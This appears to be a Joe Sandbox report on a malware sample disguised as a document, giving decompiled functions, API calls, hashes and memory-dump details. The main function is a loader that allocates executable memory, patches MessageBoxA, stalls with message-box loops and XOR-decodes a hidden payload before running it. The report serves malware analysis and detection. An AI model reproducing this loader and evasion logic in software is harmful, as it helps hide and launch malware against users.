Instruction ID: 3f72b6034b4907ecd339867a871a7e1e70f6c6e370030a898b4048fba0f11e30
Opcode Fuzzy Hash: 25b8f335346695120e735eedb78e9dc5a31549052f7cf30f88d3d9513c2700d2
Instruction Fuzzy Hash: 1141C625E043889EE7118FB88D51BEDBFB8AF2A301F14520DE9986B653D76015C5C750

Uniqueness

Uniqueness Score: -1.00%

Function 00153A86 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108
memorywindowsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00153A86() {
				signed int _v8;
				intOrPtr _v12;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				struct _SECURITY_ATTRIBUTES* _v116;
				void* _v120;
				long _v124;
				signed int _t36;
				void* _t38;
				signed int _t60;
				void* _t61;
				CHAR* _t62;
				signed int _t64;
				void* _t65;
				signed int* _t69;
				signed int _t70;
				_Unknown_base(*)()* _t72;
				signed int _t73;

				_t36 =  *0x169008; // 0x26a91022
				_v8 = _t36 ^ _t73;
				asm("movaps xmm0, [0x1662b0]");
				asm("movups [ebp-0x68], xmm0");
				asm("movaps xmm0, [0x166270]");
				asm("movups [ebp-0x58], xmm0");
				asm("movaps xmm0, [0x166280]");
				asm("movups [ebp-0x48], xmm0");
				asm("movaps xmm0, [0x1662a0]");
				asm("movups [ebp-0x38], xmm0");
				asm("movaps xmm0, [0x166290]");
				asm("movups [ebp-0x28], xmm0");
				asm("movaps xmm0, [0x166260]");
				asm("movups [ebp-0x18], xmm0");
				_v12 = 0x9d580485;
				_t38 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
				_t72 = MessageBoxA;
				_v124 = _v124 & 0x00000000;
				_v120 = _t38;
				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
				_t69 = 0x26387c;
				_v109 =  *MessageBoxA;
				_v110 =  *((intOrPtr*)(1));
				_v111 =  *((intOrPtr*)(2));
				_v112 =  *((intOrPtr*)(3));
				 *MessageBoxA = 0x900010c2;
				_v116 = 0;
				do {
					_t60 =  !( *_t69); // executed
					CreateThread(0, 0, _t72, 0, 0, 0); // executed
					if(_t60 != 0) {
						 *(_v116 + _v120) = _t60;
					}
					_v116 = _v116 + 1;
					_t69 = _t69 - 4;
					_push(0);
					_pop(0);
				} while (_t69 >= 0x169880);
				_t61 = 0xea920;
				do {
					_t70 = 0x400;
					do {
						MessageBoxA(0, "rick", "rick", 2);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					_t61 = _t61 - 1;
				} while (_t61 != 0);
				_t62 = "rick";
				do {
					MessageBoxA(0, _t62, _t62, 1);
					_t64 = 0x64;
					_t65 = _v120;
					 *(_t65 + _t70) =  *(_t65 + _t70) ^  *(_t73 + _t70 % _t64 - 0x68);
					_t70 = _t70 + 1;
				} while (_t70 < 0x3e800);
				 *_t72 = _v109;
				 *((char*)(_t72 + 1)) = _v110;
				 *((char*)(_t72 + 2)) = _v111;
				 *((char*)(_t72 + 3)) = _v112;
				 *_t65();
				L11:
				Sleep(0x1388);
				goto L11;
			}

0x00153a8c
0x00153a93
0x00153a96
0x00153a9d
0x00153aa2
0x00153aaa
0x00153aaf
0x00153ab6
0x00153abc
0x00153ac3
0x00153acc
0x00153ad3
0x00153adc
0x00153ae5
0x00153ae9
0x00153af0
0x00153af6
0x00153afc
0x00153b00
0x00153b0f
0x00153b17
0x00153b1c
0x00153b22
0x00153b28
0x00153b2e
0x00153b33
0x00153b39
0x00153b3c
0x00153b44
0x00153b46
0x00153b4e
0x00153b56
0x00153b56
0x00153b59
0x00153b5c
0x00153b5f
0x00153b61
0x00153b62
0x00153b6a
0x00153b6f
0x00153b6f
0x00153b74
0x00153b82
0x00153b84
0x00153b84
0x00153b89
0x00153b89
0x00153b8e
0x00153b93
0x00153b99
0x00153ba1
0x00153ba4
0x00153bab
0x00153bae
0x00153baf
0x00153bba
0x00153bbf
0x00153bc5
0x00153bcb
0x00153bce
0x00153bd0
0x00153bd5
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
MessageBoxA.USER32 ref: 00153B82
MessageBoxA.USER32 ref: 00153B99
Sleep.KERNEL32(00001388), ref: 00153BD5

Strings

rick, xrefs: 00153B76, 00153B7B, 00153B8E, 00153B95, 00153B96
|8&, xrefs: 00153B17

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: MessageVirtual$AllocCreateProtectSleepThread
String ID: rick$|8&
API String ID: 1205271519-1121119041
Opcode ID: 389e4c87b35c5c877fa51b3aa6a2d90e6d9db5a1dd0f2e8b8cac319f5404c1d3
Instruction ID: 08cab6686f9e6370d8d90a54898156a849c47a18e1a80e7e021810b35470c288
Opcode Fuzzy Hash: 389e4c87b35c5c877fa51b3aa6a2d90e6d9db5a1dd0f2e8b8cac319f5404c1d3
Instruction Fuzzy Hash: 4241C425E043889AE7128FB88D51BEDBFB8AF2A301F18520DE9986B653D7A015C5C760

Uniqueness

Uniqueness Score: -1.00%

Function 0015803C Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0015803C(void* __ebx, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v40;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr* _t64;
				void* _t68;

				_push(_t35);
				_t33 = _a4;
				_t50 = 0;
				_t59 = _t33;
				_t14 =  *_t33;
				while(_t14 != 0) {
					if(_t14 != 0x3d) {
						_t50 = _t50 + 1;
					}
					_t36 = _t59;
					_t53 = _t36 + 1;
					do {
						_t15 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t15 != 0);
					_t59 = _t59 + 1 + _t36 - _t53;
					_t14 =  *_t59;
				}
				_t3 = _t50 + 1; // 0x1
				_t54 = E00159E27(_t3, 4);
				if(_t54 == 0) {
					L19:
					_t54 = 0;
					goto L20;
				} else {
					_v8 = _t54;
					while(1) {
						_t51 =  *_t33;
						if(_t51 == 0) {
							break;
						}
						_t41 = _t33;
						_t62 = _t41 + 1;
						do {
							_t20 =  *_t41;
							_t41 = _t41 + 1;
						} while (_t20 != 0);
						_t21 = _t41 - _t62 + 1;
						_v12 = _t21;
						if(_t51 == 0x3d) {
							L15:
							_t33 = _t33 + _t21;
							continue;
						} else {
							_t22 = E00159E27(_t21, 1); // executed
							_t63 = _t22;
							if(_t63 == 0) {
								_push(_t54);
								L22();
								E00158B82(0);
								goto L19;
							} else {
								_t24 = E00158A6A(_t63, _v12, _t33);
								_t68 = _t68 + 0xc;
								if(_t24 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t26 = E0015749C();
									asm("int3");
									_push(_t63);
									_t64 = _v40;
									if(_t64 != 0) {
										_t27 =  *_t64;
										_push(_t54);
										_t56 = _t64;
										while(_t27 != 0) {
											E00158B82(_t27);
											_t56 = _t56 + 4;
											_t27 =  *_t56;
										}
										_t26 = E00158B82(_t64);
									}
									return _t26;
								} else {
									_t29 = _v8;
									 *_t29 = _t63;
									_v8 = _t29 + 4;
									E00158B82(0);
									_t21 = _v12;
									goto L15;
								}
							}
						}
						goto L28;
					}
					L20:
					E00158B82(0);
					return _t54;
				}
				L28:
			}

0x00158042
0x00158044
0x00158047
0x0015804b
0x0015804d
0x00158069
0x00158053
0x00158055
0x00158055
0x00158056
0x00158058
0x0015805b
0x0015805b
0x0015805d
0x0015805e
0x00158065
0x00158067
0x00158067
0x0015806d
0x00158078
0x0015807e
0x001580ee
0x001580ee
0x00000000
0x00158080
0x00158080
0x001580d7
0x001580d7
0x001580db
0x00000000
0x00000000
0x00158085
0x00158087
0x0015808a
0x0015808a
0x0015808c
0x0015808d
0x00158093
0x00158096
0x0015809c
0x001580d5
0x001580d5
0x00000000
0x0015809e
0x001580a1
0x001580a6
0x001580ac
0x001580df
0x001580e0
0x001580e7
0x00000000
0x001580ae
0x001580b3
0x001580b8
0x001580bd
0x00158101
0x00158102
0x00158103
0x00158104
0x00158105
0x00158106
0x0015810b
0x00158111
0x00158112
0x00158117
0x00158119
0x0015811b
0x0015811c
0x0015812c
0x00158121
0x00158126
0x00158129
0x0015812b
0x00158131
0x00158137
0x0015813a
0x001580bf
0x001580bf
0x001580c4
0x001580c9
0x001580cc
0x001580d1
0x00000000
0x001580d4
0x001580bd
0x001580ac
0x00000000
0x0015809c
0x001580f0
0x001580f2
0x001580fe
0x001580fe
0x00000000

APIs

_free.LIBCMT ref: 001580CC
_free.LIBCMT ref: 001580E7
_free.LIBCMT ref: 001580F2

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3227c4a33b616d44313f36813e1adeb1003ee72e47818581310f008235c852e9
Instruction ID: 9b200b1aec5ff63ee291022229bf7f99f34bbfb3d8dcb092f876db24337fc121
Opcode Fuzzy Hash: 3227c4a33b616d44313f36813e1adeb1003ee72e47818581310f008235c852e9
Instruction Fuzzy Hash: 07219032608200DFDF149E689842BBA7B69CF82326F280159FC60BF1C2DF335D0E8660

Uniqueness

Uniqueness Score: -1.00%

Function 00157FEA Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00157FEA(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x00157fef

APIs

Part of subcall function 0015B234: GetEnvironmentStringsW.KERNEL32 ref: 0015B23D
Part of subcall function 0015B234: _free.LIBCMT ref: 0015B29C
Part of subcall function 0015B234: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0015B2AB

_free.LIBCMT ref: 0015802A
_free.LIBCMT ref: 00158031

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 1804fe063bd54896d4b1637c9e9064cb3f22cc489ae7124fee10bb45d99d3dd1
Instruction ID: 02ec053ee7de60ad6ccbf6f8678ed9e66f66acb5c89f6e7d9adf05d5a746fd8f
Opcode Fuzzy Hash: 1804fe063bd54896d4b1637c9e9064cb3f22cc489ae7124fee10bb45d99d3dd1
Instruction Fuzzy Hash: E9E02223947810D9FB253B3E7C0262E26444BA1377F62031BFC30EE1C2DF60880E0556

Uniqueness

Uniqueness Score: -1.00%

Function 0015B905 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0015B905(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00159E27(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E0015999F(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00158B82(0);
				return _t35;
			}

0x0015b90b
0x0015b912
0x0015b917
0x0015b91b
0x0015b922
0x0015b928
0x0015b928
0x0015b92e
0x0015b930
0x0015b933
0x0015b933
0x0015b936
0x0015b938
0x0015b93e
0x0015b942
0x0015b947
0x0015b94b
0x0015b94f
0x0015b951
0x0015b954
0x0015b95a
0x0015b961
0x0015b965
0x0015b968
0x0015b96b
0x0015b96b
0x0015b96f
0x0015b972
0x0015b924
0x0015b924
0x0015b924
0x0015b974
0x0015b97f

APIs

Part of subcall function 00159E27: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00159246,00000001,00000364,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 00159E68

_free.LIBCMT ref: 0015B974

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1344b648b820dde75b48654b36d41ab29421988322adf45d70e7eaa060216e02
Instruction ID: d4c04cc18ef3e904463d7f4cda7aeec2a6f5527890a5643edf67ec5aac405931
Opcode Fuzzy Hash: 1344b648b820dde75b48654b36d41ab29421988322adf45d70e7eaa060216e02
Instruction Fuzzy Hash: 440126B2608316EFC7208F68D8C19DDFB98EB053B5F140629EA65BB6C0D3706C15CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00159E27 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00159E27(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x292dc0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E001588F3();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E001575D4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E0015893E(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00159e2d
0x00159e32
0x00159e40
0x00159e40
0x00159e46
0x00159e48
0x00159e48
0x00159e5f
0x00159e68
0x00159e70
0x00000000
0x00000000
0x00159e50
0x00159e52
0x00159e74
0x00159e79
0x00159e7f
0x00000000
0x00159e7f
0x00159e5b
0x00159e5d
0x00000000
0x00000000
0x00159e5d
0x00000000
0x00159e5f
0x00159e38
0x00159e3e
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00159246,00000001,00000364,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 00159E68

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5e4c5fbef02261cd56de7dfbfb27453dbf95f455ee8f15783507c629fc74b53b
Instruction ID: 0a676d773c0ad00448c5b8ebd71fa154e74608ba85db2b9ef68058ed708fd580
Opcode Fuzzy Hash: 5e4c5fbef02261cd56de7dfbfb27453dbf95f455ee8f15783507c629fc74b53b
Instruction Fuzzy Hash: 5EF0BE31605224E6DF22EB629C07B6F3749EB80762B194121EC39EE081EF20DC0986E3

Uniqueness

Uniqueness Score: -1.00%

Function 00153BDD Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00153BDD(intOrPtr* __ecx) {
				void* _t3;
				intOrPtr* _t5;

				_t5 = __ecx;
				GetCommandLineA(); // executed
				E00153A86(); // executed
				asm("int3");
				_t3 = _t5 + 4;
				if( *_t5 != _t3) {
					return E00157188( *_t5);
				} else {
					return _t3;
				}
			}

0x00153bdd
0x00153bdd
0x00153be3
0x00153be8
0x00153be9
0x00153bee
0x00153d1c
0x00153bf4
0x00153bf4
0x00153bf4

APIs

GetCommandLineA.KERNEL32 ref: 00153BDD

Part of subcall function 00153A86: VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00153AF0
Part of subcall function 00153A86: VirtualProtect.KERNELBASE(74317E90,00000100,00000040,00000000), ref: 00153B0F
Part of subcall function 00153A86: CreateThread.KERNELBASE(00000000,00000000,74317E90,00000000,00000000,00000000), ref: 00153B46
Part of subcall function 00153A86: MessageBoxA.USER32 ref: 00153B82
Part of subcall function 00153A86: MessageBoxA.USER32 ref: 00153B99

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: MessageVirtual$AllocCommandCreateLineProtectThread
String ID:
API String ID: 1227410803-0
Opcode ID: 598549ed8e367672428f69b10c997abec1a540e18c3f27856c6da7621ef1a875
Instruction ID: ce194d220985796bffd662f187f51636374639f1d6f3c6e88ebb8541a2515e9e
Opcode Fuzzy Hash: 598549ed8e367672428f69b10c997abec1a540e18c3f27856c6da7621ef1a875
Instruction Fuzzy Hash: 19C04C74015504EBCB056B74D84545477B6BFA138B7F440EDF5328E871DB324A9ADE10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00151B39 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 166
libraryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00151B39(void* __ebx, intOrPtr __ecx, struct HINSTANCE__* __edi, void* __esi, void* __eflags) {
				CHAR* _t55;
				void* _t63;
				intOrPtr _t64;
				CHAR* _t65;
				struct HRSRC__* _t67;
				struct HINSTANCE__* _t68;
				void* _t69;
				CHAR* _t75;
				struct HINSTANCE__* _t83;
				void* _t89;
				struct HINSTANCE__* _t111;
				void* _t112;
				void* _t113;
				intOrPtr _t115;

				_t109 = __edi;
				_push(0x428);
				E00160282(0x16083d, __ebx, __edi, __esi);
				_t89 = 0;
				_t55 =  *(_t112 + 8);
				_t111 = 0;
				 *(_t112 - 0x42c) =  *(_t112 + 0xc);
				 *(_t112 - 0x41c) = _t55;
				 *(_t112 - 0x428) =  *(_t112 + 0x10);
				 *(_t112 - 0x424) = 0;
				 *((intOrPtr*)(_t112 - 4)) = 0;
				 *((intOrPtr*)(_t112 - 0x430)) = __ecx;
				 *((intOrPtr*)(_t112 - 0x434)) = 0;
				 *(_t112 - 0x418) = 0;
				 *((char*)(_t112 - 4)) = 1;
				if(_t55 == 0) {
					L30:
					__eflags = _t89 - _t112 - 0x414;
					if(_t89 != _t112 - 0x414) {
						E00153D14(_t112 - 0x418);
					}
					__eflags = _t111;
					if(_t111 != 0) {
						do {
							_t109 = _t111->i;
							_t111 = _t109;
							E00157188(_t111);
							__eflags = _t109;
						} while (_t109 != 0);
					}
				} else {
					 *(_t112 - 0x420) = E001575E7(_t55) + 1;
					_t63 = E00151181(_t112 - 0x420, E001575E7(_t55) + 1);
					_t115 = _t113 + 4;
					if(_t63 < 0) {
						L29:
						_t89 =  *(_t112 - 0x418);
						goto L30;
					} else {
						_t109 =  *(_t112 - 0x420);
						_t120 = _t109 - 0x400;
						if(_t109 > 0x400 || E001511AE(0, _t109, _t109, 0, _t120) == 0) {
							_t64 = E00153CD7(_t112 - 0x424, _t111, _t109);
							_t111 =  *(_t112 - 0x424);
						} else {
							E001602F0(_t109);
							 *((intOrPtr*)(_t112 - 0x10)) = _t115;
							_t64 = _t115;
						}
						_t65 = E00151251(_t64,  *(_t112 - 0x41c), _t109, 3);
						 *(_t112 - 0x41c) = _t65;
						if(_t65 == 0) {
							goto L29;
						} else {
							_t109 = LoadLibraryExA(_t65, _t89, 0x60);
							 *(_t112 - 0x420) = _t109;
							if(_t109 != 0) {
								L10:
								_t67 = FindResourceA(_t109,  *(_t112 - 0x42c),  *(_t112 - 0x428));
								 *(_t112 - 0x42c) = _t67;
								__eflags = _t67;
								if(_t67 != 0) {
									_t68 = LoadResource(_t109, _t67);
									 *(_t112 - 0x428) = _t68;
									__eflags = _t68;
									if(_t68 == 0) {
										goto L11;
									} else {
										_t75 = SizeofResource(_t109,  *(_t112 - 0x42c));
										 *(_t112 - 0x41c) = _t75;
										_t30 =  &(_t75[1]); // 0x1
										_t98 = _t30;
										__eflags = _t30 - _t75;
										if(_t30 >= _t75) {
											 *((char*)(_t112 - 4)) = 2;
											__eflags = E00153D42(_t98) - 0x400;
											if(__eflags <= 0) {
												 *(_t112 - 0x418) = _t112 - 0x414;
											} else {
												E00153D1D(_t112 - 0x418, _t111, __eflags, _t76);
											}
											 *((intOrPtr*)(_t112 - 4)) = 1;
											__eflags =  *(_t112 - 0x418);
											if( *(_t112 - 0x418) == 0) {
												goto L14;
											} else {
												E00151285(E00151105( *(_t112 - 0x418),  *(_t112 - 0x41c),  *(_t112 - 0x428),  *(_t112 - 0x41c)));
												 *( *(_t112 - 0x418) +  *(_t112 - 0x41c)) = _t89;
												_t69 = E00152C50(_t89, _t112 - 0x434,  *(_t112 - 0x41c), __eflags,  *(_t112 - 0x418),  *((intOrPtr*)(_t112 + 0x14)));
												goto L21;
											}
										} else {
											L14:
											_t89 = 0x8007000e;
										}
									}
								} else {
									L11:
									_t69 = E001512C0();
									L21:
									_t89 = _t69;
								}
								__eflags = _t109;
								if(_t109 != 0) {
									FreeLibrary(_t109);
								}
							} else {
								_t83 = LoadLibraryExA( *(_t112 - 0x41c), _t89, 2);
								_t109 = _t83;
								 *(_t112 - 0x420) = _t83;
								if(_t109 != 0) {
									goto L10;
								} else {
									_t89 = E001512C0();
								}
							}
							if( *(_t112 - 0x418) != _t112 - 0x414) {
								E00153D14(_t112 - 0x418);
							}
							if(_t111 != 0) {
								do {
									_t109 = _t111->i;
									_t111 = _t109;
									E00157188(_t111);
								} while (_t109 != 0);
							}
						}
					}
				}
				return E001601D4(_t89, _t109, _t111);
			}

0x00151b39
0x00151b39
0x00151b43
0x00151b4b
0x00151b4d
0x00151b50
0x00151b52
0x00151b5b
0x00151b61
0x00151b67
0x00151b6d
0x00151b70
0x00151b76
0x00151b7c
0x00151b82
0x00151b88
0x00151d84
0x00151d8a
0x00151d8c
0x00151d94
0x00151d94
0x00151d99
0x00151d9b
0x00151d9d
0x00151d9d
0x00151da0
0x00151da2
0x00151da8
0x00151da8
0x00151d9d
0x00151b8e
0x00151b9d
0x00151ba3
0x00151ba8
0x00151bad
0x00151d7e
0x00151d7e
0x00000000
0x00151bb3
0x00151bb3
0x00151bb9
0x00151bbf
0x00151be1
0x00151be6
0x00151bcc
0x00151bce
0x00151bd3
0x00151bd6
0x00151bd6
0x00151bf7
0x00151bfc
0x00151c04
0x00000000
0x00151c0a
0x00151c14
0x00151c16
0x00151c1e
0x00151c47
0x00151c54
0x00151c5a
0x00151c60
0x00151c62
0x00151c70
0x00151c76
0x00151c7c
0x00151c7e
0x00000000
0x00151c80
0x00151c87
0x00151c8d
0x00151c93
0x00151c93
0x00151c96
0x00151c98
0x00151ca4
0x00151cad
0x00151cb2
0x00151cc8
0x00151cb4
0x00151cbb
0x00151cbb
0x00151cce
0x00151cf2
0x00151cf9
0x00000000
0x00151cfb
0x00151d16
0x00151d2d
0x00151d3c
0x00000000
0x00151d3c
0x00151c9a
0x00151c9a
0x00151c9a
0x00151c9a
0x00151c98
0x00151c64
0x00151c64
0x00151c64
0x00151d41
0x00151d41
0x00151d41
0x00151d43
0x00151d45
0x00151d48
0x00151d48
0x00151c20
0x00151c29
0x00151c2f
0x00151c31
0x00151c39
0x00000000
0x00151c3b
0x00151c40
0x00151c40
0x00151c39
0x00151d5a
0x00151d62
0x00151d62
0x00151d69
0x00151d6b
0x00151d6b
0x00151d6e
0x00151d70
0x00151d76
0x00151d6b
0x00151d7a
0x00151c04
0x00151bad
0x00151dbc

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00151B43
__alloca_probe_16.LIBCMT ref: 00151BCE
LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?,?,?), ref: 00151C0E
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00151C29

Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1

FindResourceA.KERNEL32(00000000,?,?), ref: 00151C54
LoadResource.KERNEL32(00000000,00000000), ref: 00151C70
SizeofResource.KERNEL32(00000000,?), ref: 00151C87
FreeLibrary.KERNEL32(00000000), ref: 00151D48

Strings

0Xv@hv, xrefs: 00151C70

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

